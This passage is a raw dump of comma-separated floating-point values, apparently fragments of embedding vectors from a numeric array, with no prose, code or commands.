24488,0.008724344,-0.005741423,-0.012663167,0.022050375,-0.011131172,0.13071154,-0.022791883,0.0020261551,0.011285169,-0.0021114482,0.008769997,0.008889882,0.016416145,0.007224202,0.012489103,0.008944386,-0.0045104306,0.029951239,0.018186769,-0.013643801,0.0091628255,-0.0035010986,0.10189319,-0.019116797,0.03357304,0.009543939,-0.0030184223,-0.0023497296,0.011249126,0.018669562,-0.062177088,-0.0022106485,-0.040799767,-0.008523962,-0.0020539353,-0.04577777,0.015846802,-0.004267741,0.0121526625,-0.0040140175,0.018005528,-0.013853924,-0.0005596633,-0.032633778,-0.0048261145,0.00055769365,-0.009044279,-0.02026004,-0.010125448,-0.01823222,0.0103154695,-0.027830798,-0.012656913,-0.007978216,0.026862364,0.01633891,-0.0072707594,0.023711314,-0.001536107,-0.0043087504,-0.005497313,0.0070652505,-0.004352919,0.0003268442,0.013419975,-0.006742567,0.012936975,-0.01654718,0.022442637,-0.021338616,-0.010391352,0.0006631827,-0.0069808126,0.0074485647,-0.0025130261,0.014520769,0.015651138,-0.008146525,-0.009209135,0.029074319,-0.003695151,-0.003158432,0.00007451582,0.0068144347,0.01396504,0.02514851,-0.0044463105,-0.012528319,0.008296062,0.020441249,0.027456,0.01000871,0.0024171846,0.013060704,-0.019685455,0.0035001857,-0.0035794175,-0.013788285,-0.0026611218,0.019321015,0.019190893,0.0028924763,-0.005564265,0.017181166,-0.0101055065,-0.006381254,0.037508093,-0.010039119,0.0011841697,-0.007323581,0.0004665934,0.00027515544,-0.026374875,-0.006538086,0.0030987714,-0.01396832,0.0027641444,-0.02017323,0.018125487,-0.013477933,-0.010429899,-0.01972575,0.0048924536,-0.02602622,0.011295083,0.0066164397,0.00087263127,-0.0043399553,-0.0071917647,-0.011347633,-0.0031091238,-0.0006756555,0.01515187,-0.0053985445,-0.016944643,-0.008061105,0.021437459,-0.0019581986,0.06145196,0.008671036,-0.026336582,0.023677891,-0.027796496,-0.02473341,-0.011352682,0.011800368,0.005232442,-0.00367634,0.021641752,-0.0070672575,-0.007825988,-0.0014211707,-0.0051365276],[-0.012612766,0.008910589,-0.027832763,-0.007328306,-0.011428463,-0.019599319,-0.0018323349,0.0073522576,0.0057008117,-0.01204134,-0.019614423,0.025410755,0.006829155,-0.00688333,-0.0021380968,-0.010768206,0.018303888,0.007040535,0.003922154,-0.0042331256,0.0065992745,-0.0034506656,0.026201144,-0.026148763,0.004948276,0.00012551562,0.005416678,0.0024980868,0.015189754,0.015710438,-0.004869731,0.012558443,0.019163305,0.0023788502,-0.0021433425,-0.0017916417,-0.009983405,-0.016543038,0.0055161715,-0.013600432,-0.014345301,0.012576956,0.0025155437,0.02630599,-0.01571252,-0.0045866068,-0.0023466505,0.021456344,-0.009414735,0.009371015,0.007328827,0.003113928,-0.023541229,0.010512819,0.00011818733,0.025701595,0.005504709,-0.022563634,0.009386789,0.0010583858,-0.014827601,0.008812562,-0.005780438,-0.017760143,0.032665405,0.005773421,0.0028460869,0.005915679,-0.010197433,-0.038017742,-0.0012235482,-0.013290317,0.017815841,-0.003131103,0.028275058,0.012675847,-0.0031658567,-0.015043131,-0.013789811,0.002854901,-0.0056070765,0.014294451,-0.0076929657,0.003651059,0.017511675,-0.009015809,-0.01626319,-0.0070985905,-0.011311392,-0.027749198,-0.006651792,-0.0036786492,0.0059972573,0.0034023446,-0.018094998,0.0055667753,0.02359819,-0.0101284245,0.020571988,0.0048176553,-0.0045448914,-0.00058161357,-0.028795278,0.017246254,0.010294583,-0.019454401,0.0006910056,-0.0019448659,0.00094277447,-0.009359206,-0.001205774,0.0068631372,0.0072234864,-0.00070967723,-0.0029662736,0.0020665508,0.0007336297,0.005093922,-0.0020553751,0.014401241,-0.010014456,0.006677295,0.0031490093,-0.0076758713,0.010834826,0.0026269187,-0.009956354,0.016175985,0.004825157,-0.015415622,-0.008647828,0.018174132,0.011080678,-0.01090574,0.019210152,-0.005026671,0.0063920408,-0.012251754,-0.00012572369,-0.020173153,0.02131771,-0.0016462798,0.014850269,0.0055652447,0.034627117,0.024851227,-0.0063325376,0.028761648,0.023169303,-0.009426104,0.010781532,-0.0059117563,-0.023861555,-0.012341424,0.005201872,0.03350258,0.0072910367,-0.0044731204,-0.031759847,-0.005640482,-0.01914939,-0.0003640577,0.011094347,-0.0013775193,-0.029475952,-0.03061573,-0.017295014,0.003798784,-0.012011031,0.01591266,0.013942158,0.027629534,0.024958167,-0.003226941,0.0126177715,0.011968162,0.007540885,-0.010365096,-0.002516128,-0.0017225564,0.0051085283,0.0041299695,0.008528026,-0.007484606,-0.014411559,0.02546848,0.0060432754,-0.019384507,-0.016921127,-0.008162012,0.0016426892,-0.013445504,-0.0010719688,-0.0010943878,-0.021619601,-0.015103591,-0.0029564905,0.09862669,-0.005821103,0.009101325,-0.023363546,0.020119779,0.0018483313,-0.022320569,-0.008550543,0.0026130388,-0.019121446,-0.019769737,0.010144303,-0.011857964,0.0125387255,0.0033082806,-0.005164768,0.00050811283,-0.0029683746,-0.059650667,0.019415125,0.030162256,-0.003735004,-0.009328231,-0.0132709965,0.012549318,0.0063765226,-0.019551542,-0.013590336,-0.037451055,0.011139495,0.0048615583,-0.0007835944,-0.01981942,0.010571568,0.010100573,-0.020520711,-0.023962073,0.0104318345,-0.021165352,0.00828708,-0.01927096,0.011722897,-0.0045169424,-0.018411398,0.013782314,0.02957553,0.03432453,-0.0015478402,0.01988317,0.030312303,0.013834108,-0.024811544,0.008621379,0.001918422,-0.012079928,0.014199059,0.022604935,-0.0027651724,-0.015583762,-0.0069980235,0.0000110755645,-0.0028772983,-0.0024571223,0.018356122,0.018287556,-0.0061310027,0.022585925,0.03352739,0.0015826888,0.01815234,-0.042656507,-0.017759511,-0.007267823,-0.008416909,-0.0051769363,-0.014427208,-0.0009703281,0.0007423079,-0.0015394262,0.009718249,0.009304711,0.010572516,-0.0058373646,-0.0042204554,0.014013074,0.008993069,-0.022697339,-0.009291985,0.00552612,-0.0049539697,0.0035278574,0.0327648,-0.0035660234,-0.0007627489,0.0078069386,0.013169432,0.0032463346,-0.00663554,-0.008028201,-0.023171963,0.002320444,0.010108246,-0.03190415,-0.0047461907,0.008238359,0.024241988,-0.0040607355,-0.010802391,-0.012713728,-0.0055037267,0.043693144,-0.0050593265,0.036149256,-0.031778377,-0.017629344,-0.021167386,0.003298612,-0.007745258,0.0051030223,-0.016447648,-0.008513253,-0.0121196555,-0.0056788716,0.012958687,-0.009467714,0.005435565,-0.03506515,-0.010247361,0.011246678,0.0064534186,-0.02541015,0.012309368,0.0125322435,-0.02035459,0.015117134,0.025602886,0.013004703,-0.011271078,0.01759802,-0.014666265,0.025796857,0.011100671,0.0057580536,-0.0183846,-0.02483348,-0.006328301,0.006524241,-0.004377172,-0.0027653386,-0.015685657,0.005526639,0.0057647713,0.0057739075,0.027884213,-0.018062191,-0.01196899,-0.0022289802,-0.024821796,0.0019583893,0.0020524284,-0.00057119684,-0.00442125,-0.031027555,0.018821359,0.008380308,-0.006888913,0.019282058,0.09172748,-0.010022494,0.0059288866,-0.0055875597,-0.018121293,-0.007490892,0.021477759,0.013721961,0.010813994,0.006264388,-0.021291565,-0.018192876,0.009148316,0.008418164,-0.022609694,0.031355016,-0.017360086,-0.020113098,-0.019132977,-0.010619162,0.03422139,-0.027587404,0.02628804,0.01686476,0.0019991596,0.019243544,0.008266681,-0.0070069735,0.0058717285,-0.025221754,-0.013657344,-0.0093932655,-0.002396638,0.0010688636,-0.040667932,0.014415761,0.016429126,0.008477696,-0.022488149,-0.00948996,0.011199012,0.0052667367,-0.00020460003,-0.02571299,-0.009532713,0.03385382,-0.0015385265,-0.0042916075,-0.018990433,0.023171581,0.011316585,0.022292653,-0.017202927,0.010974351,-0.0053222827,0.02333757,0.0081668645,-0.038581688,0.045257896,0.02586515,0.004803011,0.010707188,-0.003199349,-0.0006946698,0.00030978193,0.023750022,-0.033468314,-0.017015874,0.0038756991,0.00065009715,-0.003087978,0.0063477964,-0.016788447,0.01551805,-0.011250801,0.017438319,0.007309034,-0.010661174,0.015814375,0.033272337,-0.009132233,0.02022708,0.009253146,-0.007939675,-0.005344112,0.009510582,-0.009413793,0.008496059,0.0065330598,0.0013572666,-0.017172534,0.011994793,0.004280877,-0.0013949199,0.026489258,0.02599413,0.01405488,0.014435548,-0.0105277365,0.008878573,0.015485999,-0.006464896,-0.003947731,-0.0034190735,0.00021567428,-0.000083800325,0.009804965,-0.00090636243,0.0016966583,0.0251177,-0.015646512,0.014552225,0.0048978385,-0.015862115,0.014519457,-0.020420425,0.0066164695,-0.0048616896,-0.011013447,0.0018350334,0.019186858,0.006525827,-0.0010299194,0.016876465,0.008353587,0.010312254,-0.006813963,-0.009812565,0.017069366,0.01593554,0.0039350917,0.04915342,0.010217111,-0.033261187,0.030723266,0.0002400098,-0.016337724,-0.029093854,0.029984474,-0.00081883324,0.011417471,0.022614727,0.031450003,-0.024450283,0.013404303,0.011782938,0.037481144,0.00015710272,-0.007359789,-0.007969825,-0.009888148,-0.0021173772,0.008527518,-0.0094857365,-0.0015751502,0.014252655,0.03800882,-0.013256876,0.005152243,0.002650169,0.028377412,-0.014292549,0.007866068,-0.014366939,-0.021394571,0.020542033,0.003967982,0.06304709,-0.007218462,-0.021196706,-0.012840401,0.019156216,-0.0020445387,-0.016736504,0.01005066,-0.027795307,0.019160716,0.0056325304,0.038218196,0.0037847892,0.00017287757,-0.018930955,-0.0038605754,0.004672728,0.0069705173,0.0010842058,0.0059643784,-0.006828147,-0.0015123188,-0.004042393,-0.022887358,-0.027616285,0.010161268,0.022732172,0.0014261277,-0.005187151,-0.022056952,-0.015977094,0.002892534,0.023110418,0.0035299968,0.012989011,0.00872763,0.014530017,0.009993905,-0.021475416,0.035190064,-0.008489102,0.017300347,-0.00031947714,0.016146915,0.02558567,-0.0032062589,-0.0012175114,0.01470463,0.016266027,-0.0030072224,-0.0031345456,0.026290465,0.020535104,0.011538373,-0.02258704,0.00091751444,0.022465328,0.014771739,-0.013155575,0.014412746,-0.012894617,-0.014482694,-0.0052970783,-0.00096520025,-0.00856374,0.004216624,-0.0070217857,-0.0088787535,-0.012685798,-0.024956807,-0.013159624,0.011448877,-0.023080116,-0.02149123,0.03317353,0.015153672,-0.012373866,0.019823374,0.021273406,-0.00980088,-0.005608473,0.024321381,0.0005502794,-0.0010552601,0.0121488385,-0.006719007,0.002623911,-0.01212148,0.014221157,0.0024000583,0.014862408,-0.012914654,0.018087916,-0.0072870394,0.008465811,0.013319001,0.00771422,-0.029493488,0.002364366,0.02005675,-0.026261138,0.0017739958,-0.012707298,0.038485546,-0.017169857,-0.00041201932,0.0033116946,-0.014379015,0.010081255,-0.022863451,0.008185735,-0.052821733,-0.0067171156,0.01104276,0.005974852,-0.01795289,0.035741854,0.02003588,0.003556496,-0.00025844263,0.006413032,-0.01237693,-0.0065488783,-0.004443951,0.011543666,0.0064509646,-0.00014185482,-0.037538722,-0.013943286,-0.022479704,-0.049457125,-0.027525831,0.03863439,0.009146062,-0.0027726507,0.0049987203,0.016493933,-0.0090368595,-0.014883133,-0.00049746723,-0.030467946,-0.0110290265,0.011886536,-0.01565593,0.01927893,0.015340914,0.009235868,-0.012114772,-0.016525323,-0.0062045013,-0.0018851277,0.008181803,-0.02535019,-0.016311495,0.012009139,-0.013982927,0.010524842,-0.02542895,0.03233964,0.016531855,0.04525576,0.015622471,0.017817117,-0.008312548,0.015595644,-0.008302843,0.007712867,0.0058062915,0.028012939,0.0053493385,0.012384755,0.011294768,0.0010045763,-0.0031648343,-0.020295998,0.0023763978,0.030822868,0.036490243,-0.0033202702,0.007068375,-0.0034960427,0.020978952,0.012574205,0.007585385,-0.014814841,0.013145967,0.016603593,-0.004223479,0.026285613,-0.0022856803,-0.009166213,-0.019906444,-0.002959333,-0.012177313,0.025479242,0.029993182,0.007019848,0.02468383,0.015935339,-0.0072267274,-0.0036778299,0.0019590384,-0.01652162,-0.012715762,-0.019339297,0.008514668,-0.021361802,0.009960853,-0.040390197,0.0023039263,0.034242567,0.000242479,-0.013733408,-0.009377995,-0.021693282,-0.005373854,-0.010204905,-0.04900899,-0.0090309195,0.00017094567,0.02433305,-0.045945782,-0.013946526,0.014847019,-0.0008327099,-0.0073372866,0.016132947,-0.018651847,-0.00510518,0.0010574071,-0.012028211,0.02124155,0.023964744,0.01056975,0.009972936,-0.009691194,-0.01329656,-0.009759575,-0.0055757696,-0.0027611987,-0.004232428,0.007786184,0.007136393,-0.0049988674,-0.015399852,-0.019832887,-0.017096033,0.017610958,-0.027288713,-0.016365042,0.003910355,0.019126931,0.008540304,0.014544079,-0.033226803,0.033569857,0.027010463,-0.018595595,0.009738494,-0.01951611,0.018492762,0.027394932,0.030286463,-0.01664702,-0.03943096,-0.017211283,-0.004540498,-0.007983045,0.012305817,0.0032578332,-0.015150044,-0.013532285,-0.028458029,-0.005543537,-0.02624395,0.0072803493,0.007110188,-0.043280724,0.009599586,-0.019011227,0.0078858035,0.020739585,0.0029270332,0.009373554,0.0013349848,0.010060004,-0.024585944,-0.03341542,0.022901697,-0.025301935,0.009840169,0.014994489,-0.024416212,-0.022886828,-0.035306696,0.01200444,-0.0051307506,0.02031468,0.0048852754,-0.011734936,-0.027325053,0.021310242,-0.01783518,0.0029435838,-0.02830161,-0.012180435,-0.0026862896,0.0012471486,0.008840963,0.007111232,-0.029611016,0.017674537,-0.00061539846,-0.009402189,0.019161591,0.018509762,0.006488587,-0.007814722,0.007432556,0.01451301,-0.021493645,0.023394652,-0.012110518,0.0018181778,0.022759836,-0.0077455738,0.0041914037,-0.0025859089,-0.021200662,-0.014705602,-0.010844424,0.016341232,-0.013181872,0.0151803475,0.0014057372,-0.013337392,0.011188498,0.00440193,0.022285163,-0.0029637914,-0.0073076645,0.021402081,0.0012138848,-0.036386278,-0.011995801,0.004941154,-0.013926301,-0.015937736,0.012609386,-0.0069657285,0.030408876,0.035996947,-0.008469245,-0.0142266415,0.019296506,0.0023333426,-0.0015836179,0.0131000485,-0.009480098,-0.023829563,-0.007927489,0.025225217,-0.031995837,-0.020884538,-0.00032956083,-0.015120707,-0.00072913605,-0.035195246,0.0025856255,0.0010770858,-0.0026077013,0.012839188,-0.01866681,-0.011165438,-0.0055696713,0.019022161,0.00026359077,-0.001935304,0.009138472,-0.006417914,-0.000021841413,-0.0021765556,-0.007525999,-0.004682106,0.0036129416,0.002604294,-0.0131693715,0.011093134,-0.0133367,-0.009788668,0.003838932,-0.007920909,0.013852812,0.0134193655,-0.014589203,0.0052408916,-0.016901279,-0.012801369,-0.009554312,-0.01127054,-0.026666947,-0.005026116,0.024314443,0.01758686,-0.015542409,-0.011275411,-0.021282557,-0.06557238,0.009474299,-0.013004753,-0.03102718,0.0005333185,0.007285253,0.013558209,0.016841725,0.024555068,-0.009073495,0.0039308066,0.0075844536,0.03125766,0.009902969,0.0029416934,-0.011566891,-0.0022293425,0.016521988,0.026051406,0.011356065,0.0089917965,-0.0002887116,0.0078018266,0.005713325,0.03095414,0.007615567,-0.0126915,-0.019589046,-0.02327872,0.003038753,0.0041145775,0.025136521,0.0046062535,-0.011899552,-0.021333508,-0.008436676,0.0129274,0.017519392,-0.015953783,0.007531221,-0.0034945013,-0.00967021,0.0006259548,0.03175432,0.003225253,-0.023863038,0.0041487906,-0.006216555,0.0034416493,0.0041862214,0.021460783,-0.00850239,-0.004075029,0.016668364,-0.004984786,0.024279337,0.00825775,0.004706144,0.015674781,-0.011588362,0.002837837,-0.0018680817,0.026554022,0.0084278025,-0.031441893,-0.017022785,0.0018303795,0.038176984,-0.004354497,-0.0064966264,-0.024860509,-0.011089001,-0.028398532,0.0014331333,-0.026818765,0.019477017,-0.0022106795,-0.0033094774,-0.0055695237,-0.012206782,-0.011954584,0.0062873247,-0.021467492,-0.0037706634,-0.019583466,-0.010579259,-0.0010513642,0.004997341,-0.011570038,-0.0045959456,-0.0075892676,0.004407601,-0.018910088,0.011460832,0.006483266,0.030590115,-0.003217341,-0.00392672,0.009141157,0.0075653917,0.021525584,-0.010571889,0.0030107405,0.06217824,-0.0011019197,0.0008352366,0.002476576,0.013604994,0.038395073,0.022792242,-0.014655305,0.001794431,-0.016631303,0.023627128,0.015113871,0.0077037304,-0.01371529,0.02009218,0.047712624,0.01772128,0.0059623993,0.008394203,0.013802119,-0.0008568792,0.025451357,0.0030105994,0.008826594,-0.0033891366,-0.013473672,0.012374482,0.01045867,0.010976538,0.0130187925,-0.023820978,0.033142027,0.014152449,0.0013281483,-0.026561243,-0.008829266,0.007424481,-0.011184099,0.00503574,-0.008687231,0.0119421305,0.0007735031,-0.030610371,-0.004257555,0.006873906,-0.0039180946,0.019292444,0.0041971635,0.013739041,0.0020907398,-0.0015727832,0.000046681616,-0.012414632,0.019072386,-0.016665187,0.018067284,0.0042983172,-0.010474722,-0.032553844,-0.002801013,0.006142458,-0.034396496,0.01139177,-0.0027664707,0.0034238067,-0.012354488,-0.007496855,0.0106062535,0.018347105,-0.0040162867,0.035062972,-0.0061956733,-0.020925775,0.016828835,0.018787595,0.010530088,0.014126222,0.00095168315,0.035048474,0.014444532,-0.009029624,0.004333734,-0.004188975,-0.004453347,-0.012181024,-0.020836936,-0.004598775,-0.011367966,0.002803162,0.014707338,-0.012098602,-0.015996477,0.045465123,-0.023040868,0.026361719,-0.001816127,-0.0011543884,0.004355482,0.018283954,0.009354129,0.019395659,-0.024474151,0.010300386,0.030703139,-0.05157051,-0.0046003605,-0.009724121,0.0006291784,0.002425444,0.008003073,-0.012995593,-0.01682827,-0.0056086215,-0.014435298,-0.009932294,0.01376874,-0.019408405,0.021632258,0.039966654,0.02530938,0.002828627,0.004131563,-0.010554473,0.019719724,0.01353726,-0.002994131,0.00018321627,0.033837028,0.0017183735,0.02751259,0.024931658,-0.030353596,-0.0021550164,-0.00883958,-0.0065702256,-0.0026988965,-0.007705579,0.0061517553,0.017854752,0.016872369,-0.006401772,-0.018702868,0.03529193,0.005437305,0.00853858,-0.0006473091,0.026673166,0.004239918,0.000070656446,0.0101109035,0.012403634,-0.010265061,0.002765143,-0.018371169,-0.0034127994,-0.010344481,-0.008830223,-0.008367584,0.0037776006,-0.02134335,-0.00015960842,0.008708646,0.014429592,-0.010784146,0.0108157825,0.03255736,0.0041330527,-0.01591731,0.005079912,0.006210675,0.00517033,0.009417172,0.0027090777,-0.016082209,-0.010776836,0.010832978,0.007351232,0.0067058704,-0.003680995,0.0051201754,-0.030440897,0.009504128,0.016978428,0.010775047,-0.017397342,0.017569087,-0.0042481176,-0.019735418,-0.017029693,0.008240868,0.006150136,0.004828374,0.0022386888,-0.019101003,-0.006910944,-0.010343106,-0.00026917012,0.08241883,-0.01213426,0.002989308,0.010144236,0.023100188,-0.0043285396,0.013070803,-0.0056528645,0.011579551,-0.009736158,-0.021603707,-0.026647802,-0.0071349177,-0.020117152,0.0052482258,-0.008963918,-0.003092687,0.01096979,0.006147455,0.012494082,0.0037764173,0.002594302,0.0066871545,0.0026862375,-0.0042027663,0.01584812,0.022254335,-0.017635688,0.010349917,-0.008634918,0.01648606,-0.009613185,0.0036841976,0.021983799,0.0067485184,-0.0026016126,0.013407164,-0.008944014,-0.023494542,0.012262856,0.0029213321,-0.016749976,0.02882552,0.007548395,0.014625708,-0.008004167,-0.02440419,-0.011224322,-0.0032498036,-0.010055325,0.0046165353,-0.0023073403,-0.013554411,0.0072463094,-0.026832396,0.02449172,0.004548789,0.022203589,0.027398506,-0.0063064876,0.0024481048,0.0024406847,0.00012762523,-0.009940443,-0.014769903,-0.0070461235,0.0047107586,-0.026161354,0.030094372,-0.012119622,0.020044615,-0.01109744,2.4927747e-8,0.013411772,-0.0075271237,0.005511269,0.016165383,-0.01585089,-0.008182934,-0.033506274,-0.002920386,-0.0012830148,0.03304851,0.007397396,-0.01790557,0.008890779,-0.008299355,0.0053073154,0.073174514,0.03241502,0.011479127,-0.012613455,0.0067536538,0.01634662,0.017667467,0.022862963,-0.0057605105,0.0073056836,-0.020228451,0.024934059,0.0027715368,-0.0032968214,0.0300532,-0.011586639,0.0050136554,0.0254951,0.013047474,-0.0023999964,0.0051567205,0.030494167,0.011376213,0.0027957829,-0.0073349285,0.011449824,-0.0013983866,-0.0023630129,0.0028413425,-0.010819169,-0.02044833,0.01864225,0.014283818,-0.012801165,-0.02128991,-0.039488424,-0.0010773506,0.11248835,0.0026938736,-0.002134794,0.005228118,-0.009427463,0.016349014,-0.11985035,0.016113065,0.010444207,0.021814093,0.010257937,-0.012851931,-0.01114985,0.014365508,0.010982972,-0.010426271,-0.010153915,-0.011817719,0.02702608,-0.0152376685,-0.005151145,0.009958379,-0.014020721,0.004936408,-0.027028155,0.0012671137,0.0037343977,-0.013063992,-0.0048214477,-0.013372392,0.0030092038,-0.0055030426,0.018020933,-0.019271877,-0.01721538,0.020253425,0.024235591,-0.0074599534,-0.018012123,-0.022826873,0.014725091,0.00080880127,-0.029247727,-0.029367428,-0.17524213,0.0015894303,-0.0032962027,-0.033003077,0.020502921,-0.00645645,0.0012128334,0.008456238,0.020237911,0.021646582,-0.016410638,0.018276338,-0.008974444,0.010670748,-0.024514852,0.0051525943,-0.00017953945,-0.0012621594,0.004268801,0.0049177576,-0.0032336083,-0.00086439383,-0.031352207,-0.0072983475,-0.013801516,0.005333468,-0.0064947065,0.039352737,0.00030534054,0.0010821527,-0.013701354,-0.0008823875,-0.022326248,0.011661972,0.012308738,-0.012355673,-0.019182667,-0.0014736766,-0.0046046884,0.008307879,-0.02096106,0.011253843,-0.008042743,-0.009363247,0.013408387,0.009401999,0.012623489,0.008185306,0.02841105,0.016955186,0.03083537,0.013305497,-0.017523933,0.011855414,-0.001521772,0.005089032,0.007739256,-0.015188614,-0.012334812,0.0059652063,-0.0034026455,-0.012868644,-0.007699367,-0.012533476,0.02888602,0.008599683,0.0061115245,-0.01676404,-0.0010377303,0.009466141,-0.008897048,-0.0073341816,-0.011465738,-0.028529782,0.01651694,0.01183016,0.009414356,-0.004858211,0.022646615,-0.022872435,0.005488277,-0.025183026,-0.010047507,-0.045353085,0.008740197,0.0012615242,-0.005350026,-0.0045600594,-0.00080521137,-0.0023565004,0.031188058,-0.002685797,0.02360994,-0.0025802988,0.011895132,0.0032897638,0.03910828,-0.0059010996,-0.019292086,-0.00072451273,0.0046684844,-0.021616085,-0.017411077,0.012647065,-0.011326764,0.0042761313,0.0061519346,-0.01054643,-0.020788215,0.003987403,0.0059004705,-0.023576442,0.022525,0.0031015708,-0.032402966,-0.013134331,0.009052884,-0.0021114238,0.022536641,-0.006786533,-0.029286338,0.012254412,0.00671785,0.016688805,0.043540552,0.007768463,-0.027322398,-0.009330851,0.00956325,0.023503665,-0.03991999,0.015057404,-0.004739927,-0.0037420152,-0.016770184,-0.0018740587,-0.008164761,0.00700677,-0.030747244,0.0020189742,-0.005999888,-0.00009298584,0.006902365,-0.0068598217,-0.0027610746,-0.009294703,0.025071848,-0.0058115716,0.024083639,-0.004838244,-0.004321914,0.031488556,-0.028698971,-0.03912662,0.014322294,0.08028444,-0.0041310214,-0.0175866,0.018869512,-0.008109185,0.01882703,0.022066725,-0.0065108226,-0.01249983,-0.0018320583,-0.032358315,-0.0059239054,0.003300471,0.004484569,-0.004511129,0.020196745,0.01639667,0.016227338,0.008400926,0.008598706,0.015383413,-0.013557179,-0.010098059,0.028298814,0.014664265,0.02117406,0.008539354,0.0092654815,0.003347792,0.00056479085,-0.016726771,-0.022930294,-0.027439708,0.011278412,0.012776558,-0.04262518,-0.03691001,-0.0018410305,0.00038362906,-0.017123202,0.011334919,0.02953985,0.010072745,-0.011339866,0.00727467,-0.02749795,-0.009159108,0.004119153,-0.0066625667,-0.014294172,0.004231025,0.023964241,-0.0046740654,-0.010870391,0.011190765,-0.0026230288,-0.011810122,-0.003648434,-0.01047996,-0.0041475804,0.025799412,-0.0076173507,-0.03290957,0.009423529,-0.0083651785,0.0035770452,-0.012956091,-0.0025896842,0.0054864553,0.017587183,0.0034035395,0.0018390517,-0.012361272,0.0071539935,0.008790201,-0.021816917,-0.0038116938,-0.008099316,-0.0043221223,0.029056355,0.017258974,0.018395528,-0.003598729,-0.009909525,-0.015540692,-0.040589895,-0.014965926,0.04821356,-0.017500255,-0.00870468,0.014692299,0.00014353656,0.0069664894,-0.009806258,0.021116588,0.02212964,0.010833134,0.001193306,0.030797275,-0.008742576,0.01001136,0.009274001,0.005341823,-0.014172966,-0.00085971155,-0.013583179,-0.01004451,0.011978108,0.015618006,-0.016143434,0.008104307,-0.024807146,0.0088581955,-0.031177564,-0.00037023745,0.046154287,-0.005738944,0.017192263,0.019004656,-0.00383091,-0.021194613,0.0033566179,0.015794024,-0.028736575,0.004499007,-0.017867344,0.019565178,0.01224005,-0.01601301,0.01615094,0.0028830336,0.023887506,0.015688343,-0.002362891,-0.022712946,-0.01854946,0.028824182,0.0070120613,0.008338891,0.0187296,-0.021434713,-0.02535771,-0.015918843,-0.012330351,-0.014762241,0.0025199738,0.008964641,-0.009875362,-0.01586671,-0.0062690754,-0.034524336,0.015565545,-0.0008717907,0.008485988,0.015642244,0.02710717,-0.0064535895,-0.012174621,-0.0056270272,-0.017989311,0.006483887,0.037578434,0.0048486,0.0025050978,-0.02150593,0.021423392,0.041819647,-0.0032694454,0.02443431,0.0017080213,0.007948888,-0.02787371,0.019256098,-0.0001279406,0.00040637027,-0.007816692,0.010847174,0.0015320763,-0.012873106,-0.015881538,0.021389958,0.011981465,-0.001012912,0.0039421665,-0.008258225,0.00817567,0.00412446,0.019240439,0.006958333,0.011219415,-0.00036065094,0.006310684,0.00077958335,-0.013054704,-0.034322057,-0.0001956039,0.020984681,-0.03338444,0.015507049,0.0114134,0.004808187,0.024382744,-0.023736024,-0.016849058,-0.019648604,-0.0075851423,-0.008724203,-0.012559147,0.004552594,-0.007770799,-0.014713609,0.0015527619,-0.013755638,0.020720562,-0.0061864546,-0.009022799,-0.010407686,0.022669693,0.005533256,-0.029870218,0.010771397,0.002402123,-0.012813207,0.0010641656,-0.004812997,-0.008711063,-0.016345197,0.05197004,-0.025037887,-0.0023292368,-0.004039198,0.024441868,0.020802097,-0.02284115,0.009820126,-0.013556461,-0.010667104,-0.008141157,-0.041248847,-0.0028010812,0.003971649,-0.02720808,-0.016546736,0.025034588,0.003481635,-0.003002804,-0.008339437,0.013776329,-0.011436514,0.03053921,0.0071358485,-0.007915213,-0.040863734,-0.019663455,0.021609899,-0.025482781,0.020753946,0.016279671,-0.005345462,-0.03912209,-0.0010992634,-0.029779924,-0.01625185,-0.00051005813,0.00036357253,0.013143504,0.015295228,0.024720442,0.0048522577,-0.0065862807,0.018472949,-0.0016051675,-0.025069857,0.003470044,0.00600302,-0.01623958,0.0036403479,-0.019603653,0.007969133,0.012391053,0.016805911,-0.028408796,0.010609284,0.008518412,0.005983485,0.002988728,0.0029887997,0.0129405195,-0.012350861,-0.022005405,-0.031774066,0.0085545285,0.024883255,-0.035615545,-0.02011763,0.0058016293,-0.012234704,-0.0025815687,0.008806695,0.0033340869,0.015830265,-0.009828978,-0.013862066,0.009456461,0.007042977,-0.0018140702,0.010354976,-0.01569251,0.01091845,-0.01338027,-0.022818811,0.011175186,0.015192231,-0.014832086,0.0047731614,-0.0036173994,0.022593543,0.05284588,0.008956073,0.0035495223,-0.013288039,-0.012472602,-0.0012725348,-0.0003894292,-0.02901782,-0.002640239,-0.020405618,-0.013141367,-0.012224644,-0.020007232,-0.0025767135,-0.01432649,-0.012418372,-0.12169986,0.018506313,-0.015556125,-0.005976313,-0.017473284,-0.009338461,0.015818795,0.013745032,0.0024177816,-0.046503223,-0.002580148,0.017972922,0.015055239,-0.0049456805,-0.008962251,-0.0007174121,-0.032659266,-0.017160036,-0.0049167294,0.017311212,0.0067845597,-0.017344456,0.0068364516,-0.0017819998,0.0009384874,0.0066720895,0.0054549077,0.0140527375,0.002123663,0.015861146,0.004651583,0.00287251,0.0072362334,0.025770957,0.0020214268,0.008681746,-0.016916357,0.014643148,-0.0045870515,0.0005567978,-0.001937468,-0.004654777,-0.002774716,0.008299595,0.012304476,-0.0032786694,0.006100309,0.021330046,0.017931873,0.02335713,0.00052149285,-0.014516143,0.008581623,-0.003576466,-0.009530143,-0.035577,0.008181536,-0.0011834238,-0.0018080216,0.006835614,-0.010187003,0.0043205163,0.00072262855,-0.0024329696,0.013666901,0.003833662,-0.005251725,0.0016037972,-0.031293884,-0.007409425,-0.004125267,0.007834846,0.0018418493,0.004742501,-0.0039593177,0.008179289,0.0038169827,-0.0060294536,-0.014737653,0.011200926,-0.03629746,-0.01852817,0.010244806,0.031034961,-0.00730018,-0.02073559,-0.0053847423,0.0046396814,-0.01865381,0.008377531,-0.0005536789,-0.002874624,-0.008511664,-0.021900874,-0.0004610237,0.017317528,-0.017998587,0.01591218,-0.0074677053,0.011763788,-0.004994865,0.0029845885,0.00037590513,-0.029560532,-0.12604456,-0.011465251,0.03029764,-0.009214882,-0.013772375,-0.005503347,0.020183494,0.010348382,0.033987794,0.016245445,-0.015377399,0.023882894,-0.016007463,-0.0029509268,0.0016604058,0.0050812988,-0.024469987,-0.01071793,-0.00940798,-0.0027205145,-0.010889076,-0.020153416,0.0021368505,0.0016077508,0.02449249,0.0052212505,0.003715981,0.021082187,0.032157935,-0.0018668027,-0.008310277,0.0014441231,0.0045897546,-0.0005480574,-0.030633142,0.004593328,-0.0041588703,-0.024814216,0.0073854662,0.029576633,0.010552307,0.015716674,0.014546931,0.020505631,-0.011133977,-0.008475243,-0.010197995,0.023089742,-0.0073116887,-0.008762965,0.012840696,-0.0034341118,-0.003237667,0.012079427,-0.027057178,-0.012751033,0.009324565,0.0055562723,0.025758186,0.0123223,0.0048774444,0.00095672917,-0.006777186,0.015023287,-0.0030157657,0.006498973,